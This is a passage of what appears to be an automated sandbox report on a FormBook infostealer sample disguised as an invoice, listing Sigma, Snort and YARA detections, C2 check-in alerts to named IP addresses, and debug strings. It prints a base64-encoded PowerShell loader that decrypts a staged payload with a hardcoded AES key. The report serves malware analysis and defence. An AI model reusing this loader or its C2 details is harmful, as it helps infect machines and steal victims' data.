A1ADAALAAgADAAeABCADAALAAgADAAeAA1AEIALAAgADAAeAAzAEQALAAgADAAeAA3ADEALAAgADAAeAA4ADAALAAgADAAeABBADcALAAgADAAeABEAEMALAAgADAAeABBADgALAAgADAAeAA1AEMALAAgADAAeAAyADYALAAgADAAeAA5AEEALAAgADAAeAA3AEIALAAgADAAeAA5ADIALAAgADAAeABEAEQALAAgADAAeABFADcALAAgADAAeAA3ADYALAAgADAAeABEADAALAAgADAAeABDAEYALAAgADAAeAA0ADIALAAgADAAeAA5ADAALAAgADAAeABCAEIALAAgADAAeAA2AEYALAAgADAAeAA1AEYALAAgADAAeABDADQALAAgADAAeABCADgALAAgADAAeAAxAEQALAAgADAAeABBADYALAAgADAAeABCAEUALAAgADAAeABFADQALAAgADAAeAA2AEMALAAgADAAeAAzADUAKQAKACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFADcALAAgADAAeAA5ADkALAAgADAAeAAyADEALAAgADAAeAAyADcALAAgADAAeAA1AEEALAAgADAAeAAyAEQALAAgADAAeAAzADEALAAgADAAeAA1ADMALAAgADAAeAAwAEUALAAgADAAeABCAEIALAAgADAAeABFADQALAAgADAAeABFAEUALA
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkABIEQAQ1BDwENQQ9BD0EMARPBB8EMAQ/BDoEMAQgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJAAoBDAEMQQ7BD4EPQQgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAEgRABDUEPAQ1BD0EPQQwBE8EHwQwBD8EOgQwBCAALQBGAGkAbAB0AGUAcgAgACQAKAQwBDEEOwQ+BD0EIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAHsACgAgACAAIAAgAHAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAGgQ7BE4ERwQsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABgEPQQ4BEYEOAQwBDsEOAQ3BDgEQARDBE4ESQQ4BDkEEgQ1BDoEQgQ+BEAELAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAAUBDAEPQQ9BEsENQQKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBBAGUAcwBdADoAOgBDAHIAZQBhAHQAZQAoACkACgAgACAAIAAgACQAKAQ4BEQEQAQwBEIEPgRABC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BCAAPQAgACQAKAQ4BEQEQAQwBEIEPgRABC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAAkABoEOwROBEcELAAgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQpAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQgAD0AIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAFAQwBD0EPQRLBDUELAAgADAALAAgACQAFAQwBD0EPQRLBDUELgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQKAH0ACgAKACQAGgQ7BE4ERwQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA1ADAALAAgADAAeABCADAALAAgADAAeAA1AEIALAAgADAAeAAzAEQALAAgADAAeAA3ADEALAAgADAAeAA4ADAALAAgADAAeABBADcALAAgADAAeABEAEMALAAgADAAeABBADgALAAgADAAeAA1AEMALAAgADAAeAAyADYALAAgADAAeAA5AEEALAAgADAAeAA3AEIALAAgADAAeAA5ADIALAAgADAAeABEAEQALAAgADAAeABFADcALAAgADAAeAA3ADYALAAgADAAeABEADAALAAgADAAeABDAEYALAAgADAAeAA0ADIALAAgADAAeAA5ADAALAAgADAAeABCAEIALAAgADAAeAA2AEYALAAgADAAeAA1AEYALAAgADAAeABDADQALAAgADAAeABCADgALAAgADAAeAAxAEQALAAgADAAeABBADYALAAgADAAeABCAEUALAAgADAAeABFADQALAAgADAAeAA2AEMALAAgADAAeAAzADUAKQAKACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFADcALAAgADAAeAA5ADkALAAgADAAeAAyADEALAAgADAAeAAyADcALAAgADAAeAA1AEEALAAgADAAeAAyAEQALAAgADAAeAAzADEALAAgADAAeAA1ADMALAAgADAAeAAwAEUALAAgADAAeABCAEIALAAgADAAeABFADQALAAgADAAeABFAEUALA

            Snort Signatures

            Timestamp:05/16/24-17:19:27.047625
            SID:2855465
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:21:43.322537
            SID:2855464
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:19:56.497938
            SID:2855465
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:20:28.696791
            SID:2855464
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:21:12.951995
            SID:2855465
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:19:19.363164
            SID:2855464
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:21:22.633918
            SID:2855464
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:18:46.331711
            SID:2855465
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:19:21.898890
            SID:2855464
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:20:03.048420
            SID:2855464
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:19:51.432033
            SID:2855464
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:19:06.306804
            SID:2855464
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:21:04.300154
            SID:2855464
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:20:10.669912
            SID:2855465
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:21:51.276734
            SID:2855465
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:20:26.161324
            SID:2855464
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:21:06.836740
            SID:2855464
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:19:34.590843
            SID:2855464
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:21:27.714376
            SID:2855465
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:20:33.776360
            SID:2855465
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:19:03.768347
            SID:2856318
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:19:42.203635
            SID:2855465
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:21:20.106505
            SID:2855464
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:19:03.768347
            SID:2855464
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:20:05.587966
            SID:2855464
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:21:45.851510
            SID:2855464
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:19:11.367879
            SID:2855465
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:19:37.117289
            SID:2855464
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/16/24-17:19:48.469305
            SID:2855464
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Multi AV Scanner detection for submitted file
            Source: Factura (3).exeReversingLabs: Detection: 34%
            Yara detected FormBook
            Source: Yara matchFile source: 14.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.3767966509.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1567476017.0000000004EA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.3763434495.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3765581887.00000000059F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1574530292.0000000007EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Exploits

            barindex
            Yara detected UAC Bypass using CMSTP
            Source: Yara matchFile source: 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7492, type: MEMORYSTR
            Source: Factura (3).exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Configuration.Install.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Data.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.pdbp source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb! source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Core.pdbN source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: csc.exe, csc.exe, 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 0000000E.00000003.1424584842.0000000005012000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000E.00000002.1567920536.000000000550E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1567081999.000000000505D000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1569342109.0000000005202000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb" source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Numerics.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: chkdsk.pdbGCTL source: csc.exe, 0000000E.00000002.1567571580.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3764224956.0000000001558000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Management.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.DirectoryServices.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000009.00000002.1604691590.000001CE29C10000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb" source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: chkdsk.pdb source: csc.exe, 0000000E.00000002.1567571580.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3764224956.0000000001558000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: e.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.pdb` source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.DirectoryServices.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: wntdll.pdbUGP source: csc.exe, 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 0000000E.00000003.1424584842.0000000005012000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000E.00000002.1567920536.000000000550E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1567081999.000000000505D000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1569342109.0000000005202000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Data.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Configuration.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\System.Core.pdbpdb< source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Data.pdbH source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29EE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1606616466.000001CE29F04000.00000004.00000020.00020000.00000000.sdmp, WERFCB2.tmp.dmp.17.dr
            Source: Binary string: mscorlib.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Numerics.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: omation.pdbVX source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbp^ source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.pdb! source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: XC:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: assembly\GAC_MSC:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbPE source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Security.pdb` source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.PowerShell.Commands.Management.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.pdbh source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Core.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbD;. source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000009.00000002.1604691590.000001CE29C57000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb0 source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3762440528.000000000097E000.00000002.00000001.01000000.00000009.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000000.1640062378.000000000097E000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: System.Configuration.Install.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb0OJ source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.pdbmation.pdbpdbion.pdbment.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Xml.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.VisualBasic.pdb8 source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1604691590.000001CE29CE3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb@ source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Data.ni.pdbRSDSC source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Xml.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29EE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1606616466.000001CE29F04000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbrogram x source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.pdb3 source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29EE0000.00000004.00000020.00020000.00000000.sdmp, WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Transactions.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Core.pdbiy source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Transactions.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Transactions.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340FFC58 FindFirstFileExW,6_2_00007FF7340FFC58
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0076B5C0 FindFirstFileW,FindNextFileW,FindClose,23_2_0076B5C0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then xor eax, eax23_2_00759320
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi23_2_0075D8A9
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi23_2_00761B46

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49713 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.9:49714 -> 162.241.216.140:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49714 -> 162.241.216.140:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49716 -> 162.241.216.140:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49718 -> 162.241.216.140:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49719 -> 57.151.38.169:80
